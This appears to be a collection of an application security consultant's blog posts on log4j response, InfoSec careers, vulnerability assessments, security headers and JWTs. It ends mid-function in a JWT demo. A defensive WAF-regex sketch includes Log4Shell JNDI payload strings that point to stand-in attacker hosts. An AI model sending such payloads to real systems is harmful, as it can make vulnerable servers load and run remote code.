You may not be aware, but Canada’s Public Safety department put out a call to Canadian citizens (sorry, brilliant people who are not Canadian), asking for ideas, suggestions, and thoughts on what the Canadian government should prioritize next for InfoSec. I WAS SO EXCITED WHEN I SAW THIS AND WROTE THEM IMMEDIATELY. Obviously I made suggestions about AppSec. You have until August 19, 2022 to send your suggestions. The suggestions that I sent are below.
I would like to see the Canadian Public Service and Government of Canada focus on ensuring we are creating secure software for the public to use. I want to see formal application security programs (sometimes called a secure system development life cycle or S-SDLC) at every department. I have extensive training materials on this topic that I would be happy to provide for free to help.
I would also like to see government-wide training for all software developers on secure coding, and AppSec training for every person tasked with ensuring the software of their department is secure. When I was in the government (13.5 years), I was never allowed to have security training, because it was too expensive ($7,000 USD for a SANS class was completely out of reach). I was told the government wouldn’t arrange giant classes (say 100 people, splitting the cost of one instructor), because that would be ‘unfair competition with private industry’. You need to fix that; having a mostly untrained workforce is not a winning strategy. There needs to be a government-wide training initiative to modernize your workforce. (Again, I have free online training that can be accessed here: https://community.wehackpurple.com – join the community (free), then take any courses you want (also free).)
Create security policies that apply to all departments, then socialize them (do workshops, create videos, make sure everyone knows – don’t just post them to the TBS website and hope someone notices on their own). A secure coding guideline. An AppSec program/secure SDLC. Incident response, etc. Each department shouldn’t have to start from scratch each time. Then we could have standardization of the level of security assurance we expect from each department. I provide some of these policies in the AppSec Foundations Level 2 course, which is free in the link above.
Throw away all the old policies and procedures that are just not working. 90-day password rotation? Gone. An SA&A process that takes several weeks to complete but doesn’t actually offer much in the way of actionable advice? Gone. Re-evaluate current processes and get rid of the bad ones. We need agile processes that let people get their work done. I felt like many of the processes that I had to do in the government were in place because of a lack of trust in the staff’s competency. Instead of not trusting the staff, train them, then trust them. If they continue to screw up after training, discipline them and eventually get rid of the bad apples. Most of your staff is GOOD. Some of them are truly amazing. Treat them with trust and many of them will astound you. Remove onerous administration that is there because you don’t trust them, then let them get their jobs done.
If you have any questions I would love to talk. Thank you for putting out an open call, I’m super-impressed!
I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved in the response was spectacular (one company estimated 100 weeks of work, completed over the course of 8 days), and the damage caused is still unknown at this point. We will likely never know the true extent of the cost of this vulnerability. And this bugs me.
Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.
I met up last month with a bunch of CISOs and incident responders to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect storytelling experience you are used to here; bear with me, please.
Short rehash: log4j is a popular Java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar and, if the application was vulnerable, gain remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.
Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased by multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”. Interesting….
I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.
I happened to be on the front line at the time, doing a 3-month full-time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code that I was unaware of as their AppSec Lead made me more than a little uncomfortable, even if it was only my 4th week on the job.
I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…
For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.
I heard of several vendors whose customers demanded “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool had nothing to do with libraries, and therefore it was not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….
Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.
Those that had a WAF, RASP, or CDN were able to throw up some fancy regex and block most requests. Not a perfect or elegant solution, but it saved quite a few companies’ bacon and reduced the risk greatly.
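To give you an idea of what those emergency rules roughly looked like, here is a tiny Python sketch of that kind of pattern match (illustrative only; the payload and the pattern are examples I made up, not an actual rule anyone shipped):

```python
import re

# Illustrative only: a naive pattern of the kind an emergency WAF/CDN rule might
# have matched on, looking for the classic Log4Shell JNDI lookup string.
SUSPICIOUS = re.compile(r"\$\{.{0,30}jndi\s*:", re.IGNORECASE)

def looks_like_log4shell(value: str) -> bool:
    """Return True if a request value resembles a plain JNDI lookup attempt."""
    return bool(SUSPICIOUS.search(value))

print(looks_like_log4shell("${jndi:ldap://attacker.example/a}"))     # True  - blocked
print(looks_like_log4shell("hello, normal request parameter"))       # False - allowed
print(looks_like_log4shell("${${lower:j}ndi:ldap://evil.example}"))  # False - obfuscated payloads slip past naive patterns
```

That last line is exactly why this was a stopgap and not a fix: attackers started obfuscating their payloads almost immediately, so the patterns had to keep evolving.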
I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that is a vulnerability in itself. Log4j proved this as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly; this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”
Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.
Three years ago I decided that I would share most of my talk content with my community (everything that I am not currently applying to conferences with). At the time, I only shared one, because…. I ran out of time. Now it’s time to share the second talk, “Security is Everybody’s Job!” By “share” I mean give my express permission for anyone, anywhere, to present content that I have written, with no need to pay anything or ask for my consent. You can even charge money to give the talk! Please, just teach people about security.
Me, delivering this talk for the first time, on stage, at DevOpsDays Zurich, in beautiful Switzerland.
I’ve had a few people ask me why I would do this, and there are a few reasons:
* To spread the word about how to secure software; it’s important to me to try to make the internet and other technologies safe to use.
* To help new speakers (especially from underrepresented groups). If they have something they can present, with instructions they can follow, hopefully it will help make them more confident and skilled at presenting.
* To share knowledge with my community in general: sharing is caring, yo.
* The more people who present my talk, the more people may decide to follow me. SO MUCH WIN!
You can give this talk at any IT meetup, especially DevOps, InfoSec or any software development meetup.
Please go forth and teach AppSec! And if you have feedback I want to hear it!
Almost all of the people who respond to my #CyberMentoringMonday tweets each week say that they want to “get into InfoSec” or “become a Penetration Tester”; they rarely choose any other jobs or get more specific than that. I believe the reason for this is that they are not aware of all the different areas within the field of Information Security (InfoSec for short, and “Cyber” for those outside of our industry). I can sympathize; I was in the same position when I joined. I knew three Penetration Testers and lots of Risk Analysts, and I had no clue that there were several other areas that might interest me or even existed. I knew I didn’t want to be a Risk Analyst, so I thought the only other option was PenTester. Now I know that is not true at all. This blog post will detail several other areas within the field of Information Security in hopes that newcomers to our field can find their niche more easily. It will not be exhaustive, but I’ll do my best.
The above image shows 8 different potential areas within the field of Information Security according to the author, Henry Jiang: Governance, Risk, Career Development, User Education, Standards, Threat Intelligence, Security Architecture and Security Operations.
Since I come from the software development side of IT, and have done almost exclusively coding, my view is going to be extremely biased. With that in mind, the first area you may want to consider is Application Security (AppSec); any and all work towards ensuring that software is secure. This is the field that I work in, so it will have the most detail. There are all sorts of jobs within this field, but the most well-known is the web app pentester (sometimes called an ethical hacker); a person who does security testing on software. Such a person is often a consultant, but can also work in large companies. They test one system, intensively, perform a lot of manual testing, and then move on.
Jobs in Application Security:
Application Security Engineer: you do a mix of all the things listed under AppSec and you are generally a full-time employee. This includes making custom tools, launching a security champion program, writing guidelines, and anything else that will help ensure the security of your organization’s apps. I personally consider this the sweet spot, as I get to do changing and interesting work, and see the security posture improve over time. It is, however, usually a more senior role.
Threat Modeller: working with developers, business representatives and the security team (that’s you in this scenario) to find and document potential threats to your software, then create plans to test for and fix the issues.
Vulnerability Assessment: running lots of scans, all the time, of everything. You can scan the network too. Ideally, you will do more than this, to assess the security of the systems in your care, but it depends on where you work. This position is often an employee position and you tend to have prolonged relationships with the systems and teams you assess.
Vulnerability Management: keeping track of the vulnerabilities that all the tools and people find, reporting to management about it, and planning from a higher level. For instance: attempting to wipe out an entire bug class, implementing new tools because you see a deficiency, resource planning, etc. This is usually an employee position, and often a manager role or team lead.
Secure Code Reviewer: reading lots of code, using SAST (static application security testing) tools and SCA (Software Composition Analysis — are our 3rd party components secure?), finding vulnerabilities in written code and helping developers fix it.
DevSecOps Engineer: an AppSec engineer working in a DevOps environment. Same goal, different tactics. Adding security checks to pipelines, figuring out how to secure containers and anything else your DevOps engineers are up to.
Developer Education: this is usually a consultant role, but sometimes at large companies someone can do this full time. The person teaches the developers to write secure code, the architects to design secure apps, threat modelling, and any other topic they can think of that will help ensure their mandate (secure apps). This person is likely also to train the security champions.
Governance: writing policies, guidelines, standards, etc., to ensure your apps are secure. This is usually either someone who does all the governance work for your org and works with the AppSec team to get the details right, OR a consultant, because this is not an activity that needs to be redone constantly.
Incident Response: this area includes jobs as an incident manager (you boss everyone around and make sure the incident goes as smoothly as possible), and investigations (Forensics/DFIR). Investigating incidents related to insecure software is a topic I personally find thrilling; detective work is exciting! But with the stress it causes, it’s not for everyone.
Security Testing: often called Penetration Testing, sometimes called Red Teaming, sometimes not officially recognized as a job because management isn’t “ready” to admit they need this yet. This person tests the software (and sometimes networks) to ensure they are secure. This includes manual testing, using lots of tools, and trying to break things without causing a huge mess.
Design Review: there is a formal role for this (“Security Architect”), but AppSec folks are often asked to review designs for potential security flaws. If asked, say yes! It’s super fun and always educational. Bonus: it’s a good way to build trust between security and the developers.
In AppSec you will also be asked to do a range of other things, because that’s how life is. Potential asks: install this giant AppSec tool and figure out how it works, create a proof of concept for an exploit to show everyone that it is/is not a problem, create a proof of value with a new AppSec tool we are considering acquiring, get all the developers to log their apps like ‘so’ so that the SIEM can read the results, research how to do something securely when you have no idea how to do that thing at all, etc. As I said, it’s super fun!
ISACA Victoria, Dec 2019
Security Architect (apps, cloud, network): Security architects ensure that designs are secure. This can mean reviewing a deployment, network or application design, adding recommendations, or even creating the design themselves from scratch. This tends to be a more senior role.
SOC Analyst/Threat Hunter: SOC analysts interpret output from the monitoring tools to try to tell if something bad is happening, while threat hunters go looking for trouble. This is mostly network-based, and I’m not good at networks; otherwise, I would have been all over this when I moved into security. The idea of threat hunting (using data and patterns to spot problems) is very appealing to my metric-adoring brain. Note: SOC Analyst is a junior or intermediate position and threat hunter is not a junior position, but if you want to get into InfoSec, they are basically always hiring SOC Analysts, at almost every company.
Risk Analyst: Evaluate systems to identify and measure risk to the business, then offer recommendations on how to mitigate or when to accept the risks. This tends to be coupled closely with Compliance, and Auditing, which I won’t describe here because I am shamefully under-educated in this area.
Security Policy Writer: Writing policies about security, such as how long network passwords need to be, that all public-facing web apps must be available via HTTPS, and that only TLS 1.2 and higher are acceptable on your network. Deciding, writing, socializing and enforcing these policies are all part of this role.
Malware Analyst/Reverse Engineer: Someone needs to look at malware and figure out how it works, and sometimes people need to write exploits (for legitimate reasons, such as to prove that something is indeed vulnerable, or… You need to ask them). If you enjoy puzzles and really low-level programming (such as ARM, assembler, etc), this job might be for you. But be careful; playing with malware at home is dangerous.
Chief Information Security Officer (CISO or CSO): “The boss” of security. This person (hopefully) has a seat at the executive table, directs all security aspects for a company, and is the person held responsible, for better or for worse. If you enjoy running programs, managing things from a high level, and making a big difference, this might be a role for you.
Blue Team/Defender/Security Engineer (enterprise security/implements security tools): The people that keep us safe! These people install tools, run the tools, monitor, patch, and freak out when people download and install things to their desktops without asking. They perform security operations, making sure all the things happen, while those in the SOC (Security Operations Centre) monitor everything that’s happening and respond when there are problems.
There are many, many, many jobs within the field of Information Security, please feel free to list some of the ones that I missed in the comments below. I hope this information helps more of you join our industry because we need all the help we can get!
Recently someone asked me what the difference was between Applications and Infrastructure. He asked why a Linux operating system wasn’t “software”, and I said it was, but it’s a perfect copy (standardized), whereas I tend to speak about ‘custom software’. We ended up talking for a very long time about it, and I thought a blog post was in order.
Infrastructure is the operating systems and hardware that applications live on. Think Windows, Linux, containers, and so much more. Sometimes hardware is included in this category (depending on who you talk to), and sometimes it is not. Infrastructure is necessary to run an application; even serverless runs (briefly) on a container. Operating systems are also all standardized, and not unique in nature. For instance, if I’m running Windows Server 2012 R2, and so are you, we both have the same options for patches, configuration, etc. Operating systems are software that speaks to hardware.
Applications are software that speaks to operating systems, databases, APIs and anything else you can think of. There are custom applications (what I’m almost always talking about: software developed for a specific business need or as a product to sell), COTS (configurable off-the-shelf, like SharePoint or Confluence, administered by a person or team, installed locally on a server) and regular old software that you install or access via a web browser and use as-is (no administration required/simpler). More recently there is SaaS, software as a service, which is basically a great big COTS product hosted by someone else (no need for you to patch or otherwise take care of it; you pick your settings and use it).
Infrastructure usually needs to be patched, updated/upgraded, and hardened (secure configuration choices). Patches and upgrades arrive in a prepackaged format, but sometimes these updates can break the applications living on that infrastructure. Testing, and sometimes downtime, is required. This is why so many people say ‘patching is hard’: it is difficult to plan for testing and downtime and to ensure everything will go smoothly.
Software, on the other hand, includes many different components that are provided prepackaged (such as a new version of a library or a framework), but when you update them, sometimes other libraries or framework parts break, and/or the custom code that your team wrote can break as well. Meaning you may need to re-code or rewrite things, or update a whole bunch of things at the same time. I’ve heard developers refer to this as “dependency hell”.
If you have just released something brand new, it’s super easy to keep it up to date. Tiny changes present less risk (which is why people love DevOps over waterfall), making it easier to maintain. But because it’s sparkling and new… usually management says “hey, please build this new feature, and update that library later”. This is how technical debt accrues. It’s not operational staff or software developers saying “forget that, I don’t care about this”; it’s almost always conflicting priorities.
Happier times, before I knew anything about log4j.
Over the past 2 weeks many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4j Java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have been upgrading, removing libraries and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.
Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…
Although I already posted in my newsletter, on this blog and on my YouTube channel, I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years, that need to change.
After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.
Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.
You are amazing. Thank you for your service.
Let’s get into some systemic problems.
Inventory: Not just for Netflix Anymore
I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having a current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams who I admire. If they find it hard, how can smaller companies with fewer resources get it done? While responding to this incident, this problem has never been more obvious.
Look at past me! No idea what was about to hit her, happily celebrating her new glasses.
Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:
Public Repos that should have been private
Every type of cloud-based version control or code repo you can think of: GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
On-prem, saved to a file server – some with backups and some without
In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
SVN (Subversion), ClearCase, SourceSafe and other repos I thought no one was using anymore… that are incompatible with the AppSec tools I (and many others) had at hand.
Having it take over a week just to get access to all the various places the code is kept meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.
Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.
Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know your assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of the fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.
We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working, folks. This is a systemic problem in our industry.
Lack of Support and Governance for Open-Source Libraries
This may or may not be the biggest issue, but it is certainly the most talked-about throughout this situation. The question posed most often is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.
Lack of Tooling Coverage
The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS); that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access, or has access but the incorrect set of rights? There are dozens of reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.
Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **
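For the curious, the “search” part was not sophisticated. A rough sketch of that kind of quick-and-dirty check in Python (the folder name is made up) looks something like this:

```python
import os

# A rough sketch of the quick-and-dirty search described above: point it at a folder
# of unzipped source code and it flags any file named after log4j, plus any build
# manifest that mentions it. A snapshot in time, not a substitute for proper SCA tooling.
INTERESTING_FILES = ("pom.xml", "build.gradle", "build.gradle.kts", "ivy.xml")

def find_log4j_mentions(root: str):
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if "log4j" in name.lower():
                hits.append(path)  # a bundled jar or config file named after log4j
                continue
            if name.lower() in INTERESTING_FILES:
                try:
                    with open(path, "r", encoding="utf-8", errors="ignore") as f:
                        if "log4j" in f.read().lower():
                            hits.append(path)  # a dependency declaration that pulls log4j in
                except OSError:
                    pass
    return hits

if __name__ == "__main__":
    for hit in find_log4j_mentions("./downloaded-code"):
        print(hit)
```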
But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.
Undeployed Code
This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), paused projects, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common; it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.
Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, whether it’s paused, just an example, deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?
Lack of Incident Response/Investigation Training
Many people I spoke to who are part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, who had no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I’ve honestly not had nearly as much training as I would like, with most of what I have learned coming from on-the-job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.
The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening. Multiple people giving quotes to the media, to customers, or other teams. Different status reports that don’t make sense going to management. If you take one thing away from this article it should be that you really need to speak with one voice when the crap hits the fan….
No Shields
For those attempting to protect very old applications (for instance, any apps using log4j 1.X versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery Network) like Cloudflare, behind a WAF (Web Application Firewall) or a RASP (Runtime Application Self-Protection).
Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.
Ancient Dependencies
Several teams I advised had what I would call “Ancient Dependencies”: dependencies so old that the application would require re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why Log4j is going to take a very, very long time to square away.
Technical debt is security debt.
– Me
Solutions Needed
I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.
For those who do not follow me or Franziska Bühler, we have an open source project together called OWASP DevSlop, in which we explore DevSecOps through writing vulnerable apps, creating pipelines, publishing proof of concepts, and documenting what we’ve learned on our YouTube channel and our blogs. In this article we will explore adding security headers to our proof of concept website, DevSlop.co. This blog post is closely related to Franziska’s post OWASP DevSlop’s journey to TLS and Security Headers. If you like this one, read hers too. 🙂
Franziska Bühler and I installed several security headers during the OWASP DevSlop Show in Episodes 2, 2.1 and 2.2. Unfortunately, we found out that .Net Core apps don’t have a web.config, so the next time we published, it wiped out the beautiful headers we had added. Although that is not good news, it was another chance to learn, and it gave me a great excuse to finally write the Security Headers blog post that I have been promising. Here we go!
If you want in-depth details about what we did on the show and what each security header means, you should read Franziska’s blog post. She explains every step, and if you are trying to add security headers for the first time to your web.config (ASP.Net, not .Net CORE), you should definitely read it.
The additions for ASP.Net in your web.config look roughly like this (treat it as a sketch and choose the headers and values that make sense for your own app):
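```xml
<!-- A sketch of security headers added via web.config (ASP.Net, not .Net Core). -->
<!-- The header list and values here are examples; pick what fits YOUR app, and see -->
<!-- Franziska's post for an explanation of each header. -->
<configuration>
  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <add name="X-Content-Type-Options" value="nosniff" />
        <add name="X-Frame-Options" value="DENY" />
        <add name="Strict-Transport-Security" value="max-age=31536000; includeSubDomains" />
        <add name="Content-Security-Policy" value="default-src 'self'" />
        <remove name="X-Powered-By" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>
```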
I recently had dinner with an old friend, Jesse Hones, the Engineering Manager of Systems / Senior Software Developer at Aprel. I remember when we first met he explained that he designed and programmed robots to measure radio frequencies at extremely precise levels. Fast forward a decade: I am an ethical hacker and he is designing more complex robots than ever before. So I did what anyone would do; I asked him to come on the OWASP DevSlop show and talk about hacking robots.
Jesse Hones and one of his many robots.
His answer was “Not yet. I can’t tell you what all the loopholes are, because I still need those to get my job done.”
Interest piqued.
He explained that previously robot firmware was all custom; each system its own unique snowflake. Like custom software is today: rife with vulnerabilities, but you can only hack them one system at a time. Recently this has changed, he explained; things are standardizing and many robots use the same components, which all run the same firmware. I asked if this was like Windows XP back in the day, in that almost everyone was running it, so when a bug was discovered *every* system was vulnerable. He said yes.
But Jesse is a developer, not a security person, so he looks at it with the “I need to make sure this runs properly” lens, not the “I want to make this robot do my bidding!” viewpoint of an ethical hacker.
More of Jesse’s robots.
Obviously, I had to threat model the situation immediately. Poor Jesse.
Me: What if malware is created that stops production for all affected robots?
Jesse: Yes, this would be costly.
Me: What about ransomware?
Jesse: <unhappy face>
Me: What if someone takes over the robots and has them implant something in every 20th chip they make to spy on the users? As a supply chain attack?
Jesse: Yes, that would be very bad. However this could change soon; we may be switching over to Windows Embedded.
Me: Okay…. But what if a company used robots Stuxnet style and slowly sabotaged their competitors? So they could never quite finish their R&D on a product? Meanwhile stealing their ideas? Think Stuxnet meets Schindler’s List.
Jesse: …
Me: What if someone uses them to mine bitcoin? Robot Crypto Pirates!
Jesse: I guess tha-
Me: What if robots become the weak point of most networks and are used regularly as pivot points by hackers?
At this point Jesse has resorted to quietly waiting for me to calm down. I look at him.
Me: What if a robot murders someone?
Jesse: That would be the end. The industry could not survive. That cannot be allowed to happen. Ever.
I’d like to define a few subjects that are often confused in the application security industry: Vulnerability Assessment (VA), Vulnerability Scan (VA Scan) and Penetration Test (PenTest). They are often used interchangeably, and the differences do not seem to be well understood; I have seen this misunderstanding used against many clients who have purchased these services and am hoping clear definitions will help us all.
A Vulnerability Assessment (VA) (sometimes called a security assessment) is an assessment of the security of a system, in an attempt to find all possible vulnerabilities. It generally involves using multiple scanning tools, manual exploration and evaluation, as well as examination of all security controls (a lock on a door, a login screen, or input validation are all security controls). The assessor does not exploit vulnerabilities that are found (for instance, they see the door is unlocked, but they do not enter); they just report them, along with information on how to fix each of the vulnerabilities. This sometimes includes a security review of the design and/or threat modelling, questionnaires or interviews, and generally takes days or weeks, not hours or minutes. Sometimes the security assessor will create a proof of concept (POC) to explain a vulnerability with more clarity, but to be clear, that is not the focus of this exercise.
In the past when I was hired to do a penetration test, I would often describe a VA, ask if that was what they actually wanted, and they would say “yes, do that”. My contract would say “PenTest”, but I would conduct a vulnerability assessment.
In the past I often had requests for “a quick VA” or “VA Scan”, which as it turns out meant “one scan with a vulnerability assessment tool” and no other activities, such as manual investigation of the results. This can be done in as little as a few hours, or even minutes if your target is small, and the person performing the task does not need advanced training or skills. There are many VA tools on the market; Nessus, Nexpose, OpenVAS and Azure Security Center (for Azure cloud infrastructure only) are all used for scanning infrastructure, while Microsoft Security Risk Detection, Burp Suite, Zed Attack Proxy, NetSparker, Acunetix, AppScan, and AppSpider are for scanning web apps. Doing “a quick scan” with any of these tools will net you a list of vulnerabilities, and many of them will be true positives (as opposed to false positives); it is most certainly a worthwhile venture. It is not, however, as thorough as a Vulnerability Assessment or Penetration Test, and there will remain many other issues that are not uncovered if you leave it at that.
I also enjoy infrastructure as code, from time to time
A Penetration Test is another beast entirely. A PenTest seeks to find vulnerabilities and then exploit them, to prove real-world risk. Sometimes penetration tests can cause damage (exploits, if not done very carefully, can leave a mess), and sometimes the scope of a PenTest can call for the tester to collect “trophies” to prove they did the things they claim.
It is very rare that I write an exploit or feel the need to exploit vulnerabilities I find when testing*. Most of the times in my career when I have exploited something, everyone just ended up pissed off at me; from the first PenTest I ever did as a sub-contractor, when I ruined a live prod server and the person that hired me had to explain what happened, to creating proof of concept exploits that embarrass management into doing “the right thing”, to breaking a Drupal CMS site so badly that they had to restore the database AND the app server (Drupal itself was completely unusable) from backup. It’s nice that I impressed people, but I honestly would prefer to spend that extra time helping the developers fix what I have found and re-testing the fixes, rather than showing off whatever talent I have for burning things down.
Special note on ethics: I have seen many consultants who offer these services pass off a quick scan as a full VA or PenTest, charging for 10 days what took them only 1 day to perform. I have also seen many of these same consultants sub-contract this work out to others who they pay less (and with whom they share your sensitive data!), but they do not credit these individuals in the reports or contracts, resulting in you having no idea who had access to your systems and data. When writing contracts for such services it would be wise to be explicit about what you are paying for, as well as who will do the work and what information must remain confidential. I am sad to report that I have met many consultants who have bragged about doing these types of (in my opinion) unethical practices. Buyer beware.
I would suggest that performing a proper VA against all of your custom applications, as well as large COTS implementations (Customizable Off The Shelf systems, such as SharePoint), is a best practice for enterprise businesses. Not only would you be amazed at the things that you find, but (assuming you fix the issues) you will have taken serious measures toward avoiding a data breach in the future, as insecure software is still, sadly, the top reason for data breaches (as per the Verizon Breach Reports 2016, 2017, and 2018).
I hope this article helps instill a bit of clarity in our industry.
*When I did testing, I did exploit XSS using alert boxes, regularly, because it’s 100% safe to do so. And also blind SQL injection with timers and errors, but to be clear, I am very careful to only perform safe exploits when testing. I can feel myself putting my foot right into my mouth with this note…
I met with my colleague Bryan Hughes the other day to discuss the security of a serverless app he’s creating for JSConf EU (there will be no spoilers about his creation, don’t worry). We had discussed the idea of threat modelling while on a business trip together and he wanted to give it a go. Since I am particularly curious about serverless apps lately thanks to Tal Melamed having dragged me into the OWASP Serverless Top 10 Project, I was excited to have a chance to dive down this rabbit hole.
Bryan’s app’s architecture:
Azure Functions App (MSFT serverless)
JWT tokens for Auth, they will be short-lived
His app will allow other Azure users to call it, with parameters, and it will do something exciting (see? no spoilers!)
Bryan Hughes, South Korea, Demilitarized Zone (DMZ)
Once Bryan had explained what his app would do, he told me his security concerns: who would have access to his app? Could they break into other areas of his Azure subscription? Exactly what type of authentication token should he use? How would he handle session management? All of these are definitely valid concerns; I was impressed!
We discussed each one of his concerns, and possible technical solutions to mitigate each risk. For instance: use JWTs only to send a random session token value, never a password or sensitive data, and never a number that actually corresponds to something important. Using someone’s SIN (Social Insurance Number) as their session ID, for example, exposes sensitive info and is an insecure direct object reference. I reminded him that JWTs are encoded, not encrypted, and therefore they are not a secure way to transmit data. Also, I suggested that he create a virtual network around this app (firewalls), so that if someone gets into it, they can’t get into the rest of his network and subscription.
Note: RFC 7516 allows for the encryption of JWT tokens, follow the link for more info.
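To make the “encoded, not encrypted” point concrete, here is a little Python sketch (the claims are made up) showing that anyone holding a JWT can read its header and payload without any key; only verifying the signature requires the secret:

```python
import base64
import json

# Demo of "encoded, not encrypted": the claims below are hypothetical, and the
# signature is faked, because the point is only that the contents are readable.

def b64url(data: dict) -> str:
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# Build an (unsigned, made-up) token the way a library would
header = {"alg": "HS256", "typ": "JWT"}
payload = {"session": "abc123", "role": "user"}
token = f"{b64url(header)}.{b64url(payload)}.fake-signature"

# Now read it back: no secret key required to see the contents
def decode_segment(segment: str) -> dict:
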